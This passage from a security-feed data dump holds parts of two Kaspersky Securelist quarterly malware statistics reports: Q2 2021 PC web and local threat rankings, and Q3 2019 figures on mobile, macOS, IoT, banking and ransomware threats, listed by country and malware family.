domain is hosted._\n\nIn Q2 2021, Kaspersky solutions blocked 1,686,025,551 attacks from online resources located across the globe. 675,832,360 unique URLs were recognized as malicious by Web Anti-Virus components.\n\n_Distribution of web-attack sources by country, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141800/13-en-malware-report-q2-2021-graphs-pc.png>))_\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Belarus | 23.65 \n2 | Mauritania | 19.04 \n3 | Moldova | 18.88 \n4 | Ukraine | 18.37 \n5 | Kyrgyzstan | 17.53 \n6 | Algeria | 17.51 \n7 | Syria | 15.17 \n8 | Uzbekistan | 15.16 \n9 | Kazakhstan | 14.80 \n10 | Tajikistan | 14.70 \n11 | Russia | 14.54 \n12 | Yemen | 14.38 \n13 | Tunisia | 13.40 \n14 | Estonia | 13.36 \n15 | Latvia | 13.23 \n16 | Libya | 13.04 \n17 | Armenia | 12.95 \n18 | Morocco | 12.39 \n19 | Saudi Arabia | 12.16 \n20 | Macao | 11.67 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky products in the country._\n\n_These statistics are based on detection verdicts by the Web Anti-Virus module that were received from users of Kaspersky products who consented to provide statistical data._\n\nOn average during the quarter, 9.43% of computers of Internet users worldwide were subjected to at least one **Malware-class** web attack.\n\n_Geography of web-based malware attacks, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141830/14-en-malware-report-q2-2021-graphs-pc.png>))_\n\n## Local threats\n\n_In this section, we analyze statistical data obtained from the OAS and ODS modules in Kaspersky products. It takes into account malicious programs that were found directly on users' computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\nIn Q2 2021, our File Anti-Virus detected **68,294,298** malicious and potentially unwanted objects.\n\n### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nNote that this rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Turkmenistan | 49.38 \n2 | Tajikistan | 48.11 \n3 | Afghanistan | 46.52 \n4 | Uzbekistan | 44.21 \n5 | Ethiopia | 43.69 \n6 | Yemen | 43.64 \n7 | Cuba | 38.71 \n8 | Myanmar | 36.12 \n9 | Syria | 35.87 \n10 | South Sudan | 35.22 \n11 | China | 35.14 \n12 | Kyrgyzstan | 34.91 \n13 | Bangladesh | 34.63 \n14 | Venezuela | 34.15 \n15 | Benin | 32.94 \n16 | Algeria | 32.83 \n17 | Iraq | 32.55 \n18 | Madagascar | 31.68 \n19 | Mauritania | 31.60 \n20 | Belarus | 31.38 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._\n\n_Geography of local infection attempts, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141906/15-en-malware-report-q2-2021-graphs-pc.png>))_\n\nOn average worldwide, **Malware-class** local threats were recorded on 15.56% of users' computers at least once during the quarter. Russia scored 17.52% in this rating.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-08-12T10:00:12", "type": "securelist", "title": "IT threat evolution in Q2 2021. PC statistics", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802", "CVE-2020-1472", "CVE-2021-1675", "CVE-2021-21220", "CVE-2021-28310", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30661", "CVE-2021-30663", "CVE-2021-30665", "CVE-2021-31166", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-33742", "CVE-2021-34527"], "modified": "2021-08-12T10:00:12", "id": "SECURELIST:BB0230F9CE86B3F1994060AA0A809C08", "href": "https://securelist.com/it-threat-evolution-in-q2-2021-pc-statistics/103607/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-29T14:41:16", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22101624/malware_SL_pic3-990x400.jpg)\n\n_These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network:\n\n * Kaspersky solutions blocked 989,432,403 attacks launched from online resources in 203 countries across the globe.\n * 560,025,316 unique URLs were recognized as malicious by Web Anti-Virus components.\n * Attempted infections by malware designed to steal money via online access to bank accounts were blocked on the computers of 197,559 users.\n * Ransomware attacks were defeated on the computers of 229,643 unique users.\n * Our File Anti-Virus detected 230,051,054 unique malicious and potentially unwanted objects.\n * Kaspersky products for mobile devices detected: \n * 870,617 malicious installation packages\n * 13,129 installation packages for mobile banking Trojans\n * 13,179 installation packages for mobile ransomware Trojans\n\n## Mobile threats\n\n### Quarterly highlights\n\nIn Q3 2019, we discovered an extremely [unpleasant incident](<https://securelist.com/dropper-in-google-play/92496/>) with the popular CamScanner app on Google Play. The new version of the app contained an ad library inside with the Trojan dropper Necro built in. Judging by the reviews on Google Play, the dropper's task was to activate paid subscriptions, although it could deliver another payload if required.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171243/malware-q3-2019-statistics-en-1.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171243/malware-q3-2019-statistics-en-1.png>)\n\nAnother interesting Trojan detected in Q3 2019 is Trojan.AndroidOS.Agent.vn. Its main function is to \"like\" Facebook posts when instructed by its handlers. Interestingly, to make the click, the Trojan attacks the Facebook mobile app on the infected device, literally forcing it to execute its command.\n\nIn the same quarter, we discovered [new FinSpy spyware Trojans](<https://securelist.com/new-finspy-ios-and-android-implants-revealed-itw/91685/>) for iOS and Android. In the fresh versions, the focus is on snooping on correspondence in messaging apps. The iOS version requires a [jailbreak](<https://encyclopedia.kaspersky.com/glossary/jailbreak/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) to do its job, while the Android version is able to spy on the encrypted Threema app among others.\n\n### Mobile threat statistics\n\nIn Q3 2019, Kaspersky detected 870,617 malicious installation packages.\n\n_Number of detected malicious installation packages, Q4 2018 \u2013 Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171249/malware-q3-2019-statistics-en-2.png>)\n\nWhereas in previous quarters we observed a noticeable drop in the number of new installation packages, Q3's figure was up by 117,067 packages compared to the previous quarter.\n\n### Distribution of detected mobile apps by type\n\n_Distribution of detected mobile apps by type, Q2 and Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/29125517/malware-q3-2019-statistics-en-3.png>)\n\nAmong all the mobile threats detected in Q3 2019, the lion's share went to potentially unsolicited RiskTool-class programs (32.1%), which experienced a fall of 9 p.p. against the previous quarter. The most frequently detected objects were in the RiskTool.AndroidOS families: Agent (33.07% of all detected threats in this class), RiskTool.AndroidOS.Wapron (16.43%), and RiskTool.AndroidOS.Smssend (10.51%).\n\nSecond place went to miscellaneous Trojans united under the Trojan class (21.68%), their share increased by 10 p.p. The distribution within the class was unchanged since the previous quarter, with the Trojan.AndroidOS.Hiddapp (32.5%), Trojan.AndroidOS.Agent (12.8%), and Trojan.AndroidOS.Piom (9.1% ) families remaining in the lead. Kaspersky's machine-learning systems made a significant contribution to detecting threats: Trojans detected by this technology (the Trojan.AndroidOS.Boogr verdict) made up 28.7% \u2014 second place after Hiddapp.\n\nIn third place were Adware-class programs (19.89%), whose share rose by 1 p.p. in the reporting period. Most often, adware programs belonged to one of the following families: AdWare.AndroidOS.Ewind (20.73% of all threats in this class), AdWare.AndroidOS.Agent (20.36%), and AdWare.AndroidOS.MobiDash (14.27%).\n\nThreats in the Trojan-Dropper class (10.44%) remained at the same level with insignificant (0.5 p.p.) growth. The vast majority of detected droppers belonged to the Trojan-Dropper.AndroidOS.Wapnor family (69.7%). A long way behind in second and third place, respectively, were Trojan-Dropper.AndroidOS.Wroba (14.58%) and Trojan-Dropper.AndroidOS.Agent (8.75%).\n\n### TOP 20 mobile malware programs\n\n_Note that this malware rating does not include potentially dangerous or unwanted programs classified as RiskTool or adware._\n\n| Verdict | %* \n---|---|--- \n1 | DangerousObject.Multi.Generic | 48.71 \n2 | Trojan.AndroidOS.Boogr.gsh | 9.03 \n3 | Trojan.AndroidOS.Hiddapp.ch | 7.24 \n4 | Trojan.AndroidOS.Hiddapp.cr | 7.23 \n5 | Trojan-Dropper.AndroidOS.Necro.n | 6.87 \n6 | DangerousObject.AndroidOS.GenericML | 4.34 \n7 | Trojan-Downloader.AndroidOS.Helper.a | 1.99 \n8 | Trojan-Banker.AndroidOS.Svpeng.ak | 1.75 \n9 | Trojan-Dropper.AndroidOS.Agent.ok | 1.65 \n10 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.52 \n11 | Trojan-Dropper.AndroidOS.Hqwar.bb | 1.46 \n12 | Trojan-Downloader.AndroidOS.Necro.b | 1.45 \n13 | Trojan-Dropper.AndroidOS.Lezok.p | 1.44 \n14 | Trojan.AndroidOS.Hiddapp.cf | 1.41 \n15 | Trojan.AndroidOS.Dvmap.a | 1.27 \n16 | Trojan.AndroidOS.Agent.rt | 1.24 \n17 | Trojan-Banker.AndroidOS.Asacub.snt | 1.21 \n18 | Trojan-Dropper.AndroidOS.Necro.q | 1.19 \n19 | Trojan-Dropper.AndroidOS.Necro.l | 1.12 \n20 | Trojan-SMS.AndroidOS.Prizmes.a | 1.12 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile solutions that were attacked._\n\nFirst place in our TOP 20 as ever went to DangerousObject.Multi.Generic (48.71%), the verdict we use for malware detected [using cloud technologies](<https://www.kaspersky.com/enterprise-security/wiki-section/products/big-data-the-astraea-technology>). Cloud technologies are deployed when the antivirus databases lack data for detecting a piece of malware, but the company's cloud already contains information about the object. This is basically how the latest malicious programs are detected.\n\nSecond and six places were claimed by Trojan.AndroidOS.Boogr.gsh (9.03%) and DangerousObject.AndroidOS.GenericML (4.34%). These verdicts are assigned to files recognized as malicious by our [machine-learning systems](<https://www.kaspersky.com/enterprise-security/wiki-section/products/machine-learning-in-cybersecurity>).\n\nThird, fourth, and fourteenth places were taken by members of the Trojan.AndroidOS.Hiddapp family, whose task is to covertly foist ads onto victims.\n\nFifth, twelfth, eighteenth, and nineteenth positions went to Trojan droppers of the Necro family. Although this family showed up on the radar last quarter, really serious activity was observed only in this reporting period.\n\nSeventh place goes to Trojan-Downloader.AndroidOS.Helper.a (1.99%), which is what members of the Necro family usually extract from themselves. Helper.a is tasked with downloading arbitrary code from malicious servers and running it.\n\nThe eighth place was taken by the malware Trojan-Banker.AndroidOS.Svpeng.ak (1.75%), the main task of which is to steal online banking credentials and intercept two-factor authorization codes.\n\nNinth position went to Trojan-Dropper.AndroidOS.Agent.ok (1.65%), which is distributed under the guise of FlashPlayer or a Rapidshare client. Most commonly, it drops adware modules into the infected system.\n\nTenth and eleventh places went to members of the Trojan-Banker.AndroidOS.Hqwar family. The popularity of this dropper among cybercriminals [continues to fall](<https://securelist.com/hqwar-the-higher-it-flies-the-harder-it-drops/93689/>).\n\n### Geography of mobile threats\n\n_Geography of mobile malware infection attempts, Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171307/malware-q3-2019-statistics-en-4.png>)\n\n**TOP 10 countries by share of users attacked by mobile malware**\n\n| Country* | %** \n---|---|--- \n1 | Iran | 52.68 \n2 | Bangladesh | 30.94 \n3 | India | 28.75 \n4 | Pakistan | 28.13 \n5 | Algeria | 26.47 \n6 | Indonesia | 23.38 \n7 | Nigeria | 22.46 \n8 | Tanzania | 21.96 \n9 | Saudi Arabia | 20.05 \n10 | Egypt | 19.44 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky mobile solutions (under 10,000)._ \n_** Unique users attacked by mobile bankers as a percentage of all users of Kaspersky mobile solutions in the country._\n\nIn Q3's TOP 10, Iran (52.68%) retained top spot by share of attacked users. Note that over the reporting period the country's share almost doubled. Kaspersky users in Iran most often encountered the adware app AdWare.AndroidOS.Agent.fa (22.03% of the total number of mobile threats), adware installing Trojan.AndroidOS.Hiddapp.bn (14.68% ) and the potentially unwanted program RiskTool.AndroidOS.Dnotua.yfe (8.84%).\n\nBangladesh (30.94%) retained second place in the ranking. Users in this country most frequently encountered adware programs, including AdWare.AndroidOS.Agent.f\u0441 (27.58% of the total number of mobile threats) and AdWare.AndroidOS.HiddenAd.et (12.65%), as well as Trojan.AndroidOS.Hiddapp.cr (20.05%), which downloads adware programs.\n\nIndia (28.75%) climbed to third place due to the same threats that were more active than others in Bangladesh: AdWare.AndroidOS.Agent.f\u0441 (36.19%), AdWare.AndroidOS.HiddenAd.et (17.17%) and Trojan.AndroidOS.Hiddapp.cr (22.05%).\n\n### Mobile banking Trojans\n\nIn the reporting period, we detected **13,129** installation packages for mobile banking Trojans, only 770 fewer than in Q2 2019.\n\nThe largest contributions to the statistics came from the Trojan-Banker.AndroidOS.Svpeng (40.59% of all detected banking Trojans), Trojan-Banker.AndroidOS. Agent (11.84%), and Trojan-Banker.AndroidOS.Faketoken (11.79%) families.\n\n_Number of installation packages for mobile banking Trojans detected by Kaspersky, Q3 2018 \u2013 Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171313/malware-q3-2019-statistics-en-5.png>)\n\n**TOP 10 mobile banking Trojans**\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Banker.AndroidOS.Svpeng.ak | 16.85 \n2 | Trojan-Banker.AndroidOS.Asacub.snt | 11.61 \n3 | Trojan-Banker.AndroidOS.Svpeng.q | 8.97 \n4 | Trojan-Banker.AndroidOS.Asacub.ce | 8.07 \n5 | Trojan-Banker.AndroidOS.Agent.ep | 5.51 \n6 | Trojan-Banker.AndroidOS.Asacub.a | 5.27 \n7 | Trojan-Banker.AndroidOS.Faketoken.q | 5.26 \n8 | Trojan-Banker.AndroidOS.Agent.eq | 3.62 \n9 | Trojan-Banker.AndroidOS.Faketoken.snt | 2.91 \n10 | Trojan-Banker.AndroidOS.Asacub.ar | 2.81 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile solutions that were attacked by banking threats._\n\nThe TOP 10 banking threats in Q3 2019 was headed by Trojans of the Trojan-Banker.AndroidOS.Svpeng family: Svpeng.ak (16.85%) took first place, and Svpeng.q (8.97%) third. This is not the first time we have detected amusing obfuscation in Trojans from Russian-speaking cybercriminals \u2014 this time the code of the malware Svpeng.ak featured the names of video games.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171317/malware-q3-2019-statistics-en-6.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171317/malware-q3-2019-statistics-en-6.png>)\n\n_Snippets of decompiled code from Trojan-Banker.AndroidOS.Svpeng.ak_\n\nSecond, fourth, sixth, and tenth positions in Q3 went to the Asacub Trojan family. Despite a decrease in activity, Asacub samples are still found on devices around the world.\n\n_Geography of mobile banking threats, Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171323/malware-q3-2019-statistics-en-7.png>)\n\n**TOP 10 countries by share of users attacked by mobile banking Trojans:**\n\n| Country* | %** \n---|---|--- \n1 | Russia | 0.30 \n2 | South Africa | 0.20 \n3 | Kuwait | 0.18 \n4 | Tajikistan | 0.13 \n5 | Spain | 0.12 \n6 | Indonesia | 0.12 \n7 | China | 0.11 \n8 | Singapore | 0.11 \n9 | Armenia | 0.10 \n10 | Uzbekistan | 0.10 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky mobile solutions (under 10,000)._ \n_** Unique users attacked by mobile banking Trojans as a percentage of all users of Kaspersky mobile solutions in the country._\n\nIn Q3 Russia moved up to first place (0.30%), which impacted the entire pattern of mobile bankers spread around the world. Users in Russia were most often targeted with Trojan-Banker.AndroidOS.Svpeng.ak (17.32% of all attempts to infect unique users with mobile financial malware). The same Trojan made it into the TOP 10 worldwide. It is a similar story with second and third places: Trojan-Banker.AndroidOS.Asacub.snt (11.86%) and Trojan-Banker.AndroidOS.Svpeng.q (9.20%).\n\nSouth Africa fell to second place (0.20%), where for the second quarter in a row Trojan-Banker.AndroidOS.Agent.dx (89.80% of all mobile financial malware) was the most widespread threat.\n\nBronze went to Kuwait (0.21%), where, like in South Africa, Trojan-Banker.AndroidOS.Agent.dx (75%) was most often encountered.\n\n### Mobile ransomware Trojans\n\nIn Q3 2019, we detected 13,179 installation packages for mobile ransomware \u2014 10,115 fewer than last quarter. We observed a similar drop in Q2, so since the start of the year the number of mobile ransomware Trojans has decreased almost threefold. The reason, as we see it, is the decline in activity of the group behind the Asacub Trojan.\n\n_Number of installation packages for mobile banking Trojans, Q3 2018 \u2013 Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171329/malware-q3-2019-statistics-en-8.png>)\n\n**TOP 10 mobile ransomware Trojans**\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Ransom.AndroidOS.Svpeng.aj | 40.97 \n2 | Trojan-Ransom.AndroidOS.Small.as | 8.82 \n3 | Trojan-Ransom.AndroidOS.Svpeng.ah | 5.79 \n4 | Trojan-Ransom.AndroidOS.Rkor.i | 5.20 \n5 | Trojan-Ransom.AndroidOS.Rkor.h | 4.78 \n6 | Trojan-Ransom.AndroidOS.Small.o | 3.60 \n7 | Trojan-Ransom.AndroidOS.Svpeng.ai | 2.93 \n8 | Trojan-Ransom.AndroidOS.Small.ce | 2.93 \n9 | Trojan-Ransom.AndroidOS.Fusob.h | 2.72 \n10 | Trojan-Ransom.AndroidOS.Small.cj | 2.66 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile solutions that were attacked by ransomware Trojans._\n\nIn Q3 2019, the leading positions among ransomware Trojans were retained by members of the Trojan-Ransom.AndroidOS.Svpeng family. Top spot, as in the previous quarter, was claimed by Svpeng.aj (40.97%), with Svpeng.ah (5.79%) in third.\n\n_Geography of mobile ransomware Trojans, Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171337/malware-q3-2019-statistics-en-9.png>)\n\n**TOP 10 countries by share of users attacked by mobile ransomware Trojans:**\n\n| Country* | %** \n---|---|--- \n1 | US | 1.12 \n2 | Iran | 0.25 \n3 | Kazakhstan | 0.25 \n4 | Oman | 0.09 \n5 | Qatar | 0.08 \n6 | Saudi Arabia | 0.06 \n7 | Mexico | 0.05 \n8 | Pakistan | 0.05 \n9 | Kuwait | 0.04 \n10 | Indonesia | 0.04 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky mobile solutions (under 10,000)._ \n_** Unique users attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky mobile solutions in the country._\n\nThe leaders by number of users attacked by mobile ransomware Trojans, as in the previous quarter, were the US (1.12%), Iran (0.25%), and Kazakhstan (0.25%)\n\n## Attacks on Apple macOS\n\nQ3 saw a lull in the emergence of new threats. An exception was the distribution of a [modified version](<https://blog.trendmicro.com/trendlabs-security-intelligence/mac-malware-that-spoofs-trading-app-steals-user-information-uploads-it-to-website/>) of the Stockfolio investment app, which contained an encrypted reverse shell backdoor.\n\n### TOP 20 threats for macOS\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Downloader.OSX.Shlayer.a | 22.71 \n2 | AdWare.OSX.Pirrit.j | 14.43 \n3 | AdWare.OSX.Pirrit.s | 11.73 \n4 | AdWare.OSX.Pirrit.p | 10.43 \n5 | AdWare.OSX.Pirrit.o | 9.71 \n6 | AdWare.OSX.Bnodlero.t | 8.40 \n7 | AdWare.OSX.Spc.a | 7.32 \n8 | AdWare.OSX.Cimpli.d | 6.92 \n9 | AdWare.OSX.MacSearch.a | 4.88 \n10 | Adware.OSX.Agent.d | 4.71 \n11 | AdWare.OSX.Ketin.c | 4.63 \n12 | AdWare.OSX.Ketin.b | 4.10 \n13 | Downloader.OSX.InstallCore.ab | 4.01 \n14 | AdWare.OSX.Cimpli.e | 3.86 \n15 | AdWare.OSX.Bnodlero.q | 3.78 \n16 | AdWare.OSX.Cimpli.f | 3.76 \n17 | AdWare.OSX.Bnodlero.x | 3.49 \n18 | AdWare.OSX.Mcp.a | 3.26 \n19 | AdWare.OSX.MacSearch.d | 3.18 \n20 | AdWare.OSX.Amc.a | 3.15 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky security solutions for macOS that were attacked._\n\nLike last quarter, the adware Trojan Shlayer was the top threat for macOS. This malware in turn downloaded adware programs of the Pirrit family, as a result of which its members took the second to fifth positions in our ranking.\n\n### Threat geography\n\n| Country* | %** \n---|---|--- \n1 | France | 6.95 \n2 | India | 6.24 \n3 | Spain | 5.61 \n4 | Italy | 5.29 \n5 | US | 4.84 \n6 | Russia | 4.79 \n7 | Brazil | 4.75 \n8 | Mexico | 4.68 \n9 | Canada | 4.46 \n10 | Australia | 4.27 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000)_ \n_** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._\n\nThe geographical distribution of attacked users underwent some minor changes: India took silver with 6.24% of attacked users, while Spain came in third with 5.61%. France (6.95%) hung on to first position.\n\n## IoT attacks\n\n### IoT threat statistics\n\nIn Q3, the trend continued toward a decrease in the number of IP addresses of devices used to carry out attacks on Kaspersky Telnet honeypots. If in Q2 Telnet's share was still significantly higher than that of SSH, in Q3 the figures were almost equal. \n \nSSH | 48.17% \nTelnet | 51.83% \n \n_Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q3 2019_\n\nAs for the number of sessions involving Kaspersky [traps](<https://encyclopedia.kaspersky.com/glossary/honeypot-glossary/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), we noted that in Q3 Telnet-based control was also deployed more often. \n \nSSH | 40.81% \nTelnet | 59.19% \n \n_Distribution of cybercriminal working sessions with Kaspersky traps, Q3 2019_\n\n### Telnet-based attacks\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky Telnet traps, Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171344/malware-q3-2019-statistics-en-10.png>)\n\n**TOP 10 countries by location of devices from which telnet-based attacks were carried out on Kaspersky traps**\n\n| Country | %* \n---|---|--- \n1 | China | 13.78 \n2 | Egypt | 10.89 \n3 | Brazil | 8.56 \n4 | Taiwan | 8.33 \n5 | US | 4.71 \n6 | Russia | 4.35 \n7 | Turkey | 3.47 \n8 | Vietnam | 3.44 \n9 | Greece | 3.43 \n10 | India | 3.41 \n \nLast quarter's leaders Egypt (10.89%), China (13.78%), and Brazil (8.56%) again made up the TOP 3, the only difference being that this time China took the first place.\n\nTelnet-based attacks most often resulted in the download of a member of the notorious Mirai family.\n\n**TOP 10 malware downloaded to infected IoT devices via successful telnet-based attacks **\n\n| Verdict | %* \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 38.08 \n2 | Trojan-Downloader.Linux.NyaDrop.b | 27.46 \n3 | Backdoor.Linux.Mirai.ba | 16.52 \n4 | Backdoor.Linux.Gafgyt.bj | 2.76 \n5 | Backdoor.Linux.Mirai.au | 2.21 \n6 | Backdoor.Linux.Mirai.c | 2.02 \n7 | Backdoor.Linux.Mirai.h | 1.81 \n8 | Backdoor.Linux.Mirai.ad | 1.66 \n9 | Backdoor.Linux.Gafgyt.az | 0.86 \n10 | Backdoor.Linux.Mirai.a | 0.80 \n \n_* Share of malware type in the total amount of malware downloaded to IoT devices following a successful Telnet-based attack._\n\n### SSH-based attacks\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky SSH traps, Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171352/malware-q3-2019-statistics-en-11.png>)\n\n**TOP 10 countries by location of devices from which attacks were made on Kaspersky SSH traps**\n\n| Country | %* \n---|---|--- \n1 | Egypt | 17.06 \n2 | Vietnam | 16.98 \n3 | China | 13.81 \n4 | Brazil | 7.37 \n5 | Russia | 6.71 \n6 | Thailand | 4.53 \n7 | US | 4.13 \n8 | Azerbaijan | 3.99 \n9 | India | 2.55 \n10 | France | 1.53 \n \nIn Q3 2019, the largest number of attacks on Kaspersky traps using the SSH protocol came from Egypt (17.06%). Vietnam (16.98%) and China (13.81%) took second and third places, respectively.\n\n## Financial threats\n\n### Financial threat statistics\n\nIn Q3 2019, Kaspersky solutions blocked attempts to launch one or more types of malware designed to steal money from bank accounts on the computers of 197,559 users.\n\n_Number of unique users attacked by financial malware, Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171358/malware-q3-2019-statistics-en-12.png>)\n\n### Attack geography\n\nTo evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky products that faced this threat during the reporting period out of all users of our products in that country.\n\n_Geography of banking malware attacks, Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171406/malware-q3-2019-statistics-en-13.png>)\n\n**TOP 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Belarus | 2.9 \n2 | Uzbekistan | 2.1 \n3 | South Korea | 1.9 \n4 | Venezuela | 1.8 \n5 | Tajikistan | 1.4 \n6 | Afghanistan | 1.3 \n7 | China | 1.2 \n8 | Syria | 1.2 \n9 | Yemen | 1.2 \n10 | Sudan | 1.1 \n \n_* Excluded are countries with relatively few Kaspersky product users (under 10,000)._ \n_** Unique users whose computers were targeted by banking Trojans as a percentage of all unique users of Kaspersky products in the country._\n\n**TOP 10 banking malware families**\n\n| Name | Verdicts | %* \n---|---|---|--- \n1 | Zbot | Trojan.Win32.Zbot | 26.7 | \n2 | Emotet | Backdoor.Win32.Emotet | 23.9 | \n3 | RTM | Trojan-Banker.Win32.RTM | 19.3 | \n4 | Nimnul | Virus.Win32.Nimnul | 6.6 | \n5 | Trickster | Trojan.Win32.Trickster | 5.8 | \n6 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 5.4 | \n7 | Nymaim | Trojan.Win32.Nymaim | 3.6 | \n8 | SpyEye | Trojan-Spy.Win32.SpyEye | 3.4 | \n9 | Danabot | Trojan-Banker.Win32.Danabot | 3.3 | \n10 | Neurevt | Trojan.Win32.Neurevt | 1.8 | \n \n_** Unique users attacked by this malware as a percentage of all users attacked by financial malware._\n\nThe TOP 3 in Q3 2019 had the same faces as last quarter, only in a different order: the RTM family (19.3%) dropped from first to third, shedding almost 13 p.p., allowing the other two \u2014 Zbot (26.7%) and Emotet (23.9%) \u2014 to climb up. Last quarter we noted a decline in the activity of Emotet servers, but in Q3 it came back on track, with Emotet's share growing by more than 15 p.p.\n\nFourth and fifth places did not change at all \u2014 still occupied by Nimnul (6.6%) and Trickster (5.8%). Their scores rose insignificantly, less than 1 p.p. Of the new entries in our TOP 10, worth noting is the banker CliptoShuffler (5.4%), which stormed straight into sixth place.\n\n## Ransomware programs\n\n### Quarterly highlights\n\nThe number of ransomware attacks against [government](<https://threatpost.com/ransomware-demand-massachusetts-city-no-thanks/148034/>) [agencies](<https://threatpost.com/coordinated-ransomware-attack-hits-23-texas-government-agencies/147457/>), as well as organizations in the healthcare, [education](<https://www.bleepingcomputer.com/news/security/monroe-college-hit-with-ransomware-2-million-demanded/>), and [energy](<https://www.bleepingcomputer.com/news/security/ransomware-attack-cripples-power-company-s-entire-network/>) sectors, continues to rise. This trend we [noted](<https://securelist.com/it-threat-evolution-q2-2019-statistics/92053/#glavnye-sobytiya-kvartala>) back in the previous quarter.\n\nA [new type of attack](<https://threatpost.com/linux-ransomware-nas-servers/146441/>), one on network attached storages (NAS), is gaining ground. The infection scheme involves attackers scanning IP address ranges in search of NAS devices accessible via the Internet. Generally, only the web interface is accessible from the outside, protected by an authentication page; however, a number of devices have vulnerabilities in the firmware. This enables cybercriminals, by means of an exploit, to install on the device a Trojan that encrypts all data on 